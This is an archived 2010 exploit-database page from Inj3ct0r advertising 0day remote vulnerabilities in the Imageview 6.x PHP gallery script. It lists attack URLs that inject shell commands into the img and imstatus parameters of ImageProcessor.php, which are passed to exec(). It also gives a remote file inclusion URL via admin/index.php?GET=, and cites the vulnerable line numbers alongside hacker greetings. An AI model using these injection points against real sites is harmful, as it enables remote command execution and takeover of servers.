[webapps / 0day] - Imageview <= 6.x Multiple Remote Vulne
Posted on 10 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Imageview <= 6.x Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Imageview <= 6.x Multiple Remote Vulnerabilities by Sn!pEr.S!Te in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================ Imageview <= 6.x Multiple Remote Vulnerabilities ================================================ || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . +----------------------------------------------------------------------- -+ | ....... | | ..''xxxxxxxxxxxxxxx'... | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | | .xxxxxxxxxxxxxxxxxx'... ........ .'. | | 'xxxxxxxxxxxxxxx'...... '. | | 'xxxxxxxxxxxxxx'..'x.. .x. | | .xxxxxxxxxxxx'...'.. ... .' | | 'xxxxxxxxx'.. . .. .x. | | xxxxxxx'. .. x. | | xxxx'. .... x x. | | 'x'. ...'xxxxxxx'. x .x. | | .x'. .'xxxxxxxxxxxxxx. '' .' | | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | | .'xxxxxxx'.... ...xxxxxxx'. | | ..'xxxxx'.. ..xxxxx'.. | | ....'xx'.....''''... | +----------------------------------------------------------------------- -+ [+] Author : Sn!pEr.S!Te Hacker # # [+] Email : sniper-site@HoTMaiL.coM # # [+] Inj3ct0r Team Hacker # # [+] 10-10-2010 # # [+] Script :lmage ? Imageview # # [+] Download:http://www.blackdot.be/files/downloads/imageview6-install.zip# # Version: [6.x] # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= [=-Exploit-=] command :- http://localhost/imageview6/system/ImageProcessor.php?img= [inj3ct0r command] http://127.0.0.1/imageview6/system/ImageProcessor.php?imstatus= [inj3ct0r command] line : 77 Code : exec ($ this->imagemagick_path.'version',$imstatus line : 393 Code :exec ($img); --------------------------------------------------------------------------------------------- [=-Exploit-=] File inclusion : http://localhost/imageview6/admin/index.php?GET=[inj3ct0r RFI] http://127.0.0.1/imageview6/admin/index.php?GET=[ inj3ct0r RFI] Line :86 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All : www.Exploit-db.com | wwww.inj3ct0r.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ================== cyb3r army ================================================== SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ===========================all my friend =================================== * PrX Hacker * Mr.aBoZ7Z7 * AbUbAdR * Nazi H4x0r * DMaR AL-TMiMi | * Sm Hacker * Bnx Hacker * KaSpEr NaJd * FoX Hacker *HaNniBaL KsA | # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-10]</pre></body></html>
